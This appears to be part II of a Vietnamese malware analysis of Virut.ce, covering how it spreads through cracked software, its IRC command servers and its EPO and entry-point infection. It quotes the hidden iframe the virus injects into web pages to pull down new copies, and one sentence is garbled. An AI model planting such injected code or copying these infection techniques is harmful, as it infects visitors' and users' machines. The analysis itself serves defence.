Tổng quan về mẫu malware Virus.Win32.Virut.ce
(Phần II)
Số lượng máy tính bị lây nhiễm bởi Virut.ce trong cùng thời gian từ tháng
05/2009 đến 05/2010
Cách thức lây nhiễm của mẫu virus này chủ yếu qua file thực thi *.exe và
HTML, hoặc những chương trình crack phần mềm, nhưng chúng ta vẫn
thường gọi là keygen và những file đã được crack sẵn. Cụ thể hơn, chúng
thường xuyên ẩn mình trong file crack dạng RAR/SFX với tên gọi như
codename_panzers_cold_war_key.exe hoặc
advanced_archive_password_recovery_4.53_key.exe.
Các chức năng chính của Virut
Tiếp theo, chúng ta sẽ đi đến phần chức năng quan trọng nhất – quá trình
payload (hiểu nôm na là việc thực hiện các hành vi lấy cắp dữ liệu có liên
quan đến mục đích tài chính từ người sử dụng bị lây nhiễm) của virut. Đây là
phần rất dễ nhận biết, vì nó được tạo ra và sử dụng của bất kỳ mẫu virut nào
mà không có ngoại lệ. Rất hiệu quả, thông thường nó sẽ cấy 1 chương trình
backdoor trước tiên để xâm nhập vào vùng hoạt động của tiến trình
explorer.exe (ví dụ như services.exe hoặc iexplore.exe), sau đó thực hiện các
kết nối tới địa chỉ irc.zief.pl và proxim.ircgalaxy.pl thông qua giao thức IRC
và chờ đợi các câu lệnh, tín hiệu phản hồi. Những thủ tục này có thể dễ dàng
được phát hiện bởi các chương trình an ninh phổ biến hiện nay như nod32,
rising, f-secure…:
Hình ảnh biểu diễn quá trình giải mã phần body tĩnh của Virut.ce bao gồm
tên ứng dụng bị khóa bởi virus
Trên thực tế, các mẫu virus lây nhiễm vào file *.htm, *.php và *.asp được lưu
trữ ngay bên trong các ngõ ngách của máy tính. Để làm điều này, chúng đã tự
thêm các dòng lệnh sau vào mã cơ bản: <iframe src = http://jl.*****.pl/rc/
style = ‘display:none’></iframe>. Câu lệnh này sẽ tự động tải phiên bản mới
nhất của virut về máy tính thông qua lỗ hổng của file định dạng PDF. Những
dòng này sẽ thay đổi tùy theo các phiên bản tương ứng của biến thể ce. Ví dụ,
ký tự u có thể được thay thế bởi u, có thể không ảnh hưởng tới trình
duyệt nhưng sẽ bảo vệ quá trình nhận diện khi chúng hoạt động.
Thảo luận chung và các phương thức lây nhiễm
Về bản chất, Virut.ce sử dụng công nghệ EPO hoặc ghi đè lên các điểm entry
để tiến hành lây nhiễm, đồng thời, 1 hoặc 2 công cụ giải mã được sử dụng
kèm trong quá trình trên. Công nghệ Entry Point Obscuring (EPO) hoạt động
dựa trên khả năng chống lại sự nhận diện. Thông thường, quá trình này được
thực hiện bằng cách thay thế những chỉ dẫn ngẫu nhiên trong toàn bộ mã
nguồn chính của chương trình và các tham số đi kèm. Bên dưới đây là ví dụ
về quá trình thay thế các chỉ dẫn và địa chỉ làm việc:
Cụm từ rewriting the entry point – dịch nôm na là quá trình ghi đè các điểm
entry, ngụ ý đến việc sửa đổi các dữ liệu PE header của file đang bị lây
nhiễm, đặc biệt là việc ghi đè lên trường dữ liệu AddressOfEntryPoint trong
cấu trúc IMAGE_NT_HEADERS32. Do đó, file thực thi sẽ trực tiếp khởi
động và kích hoạt các thành phần chính của virus. Như đã thảo luận bên trên,
các mẫu virus chỉ sử dụng 1 hoặc 2 công cụ giải mã chính trong quá trình lây
nhiễm – có thể tạm gọi là Init và Main. Công cụ giải mã Main được xác định
trong từng file bị tác động bởi Virut.ce, trong khi phần Init chỉ thỉnh thoảng
hoạt động.
![Cẩm nang phòng chống, giảm thiểu rủi ro từ tấn công Ransomware [Mới nhất]](https://cdn.tailieu.vn/images/document/thumbnail/2025/20250627/vijiraiya/135x160/48331751010876.jpg)
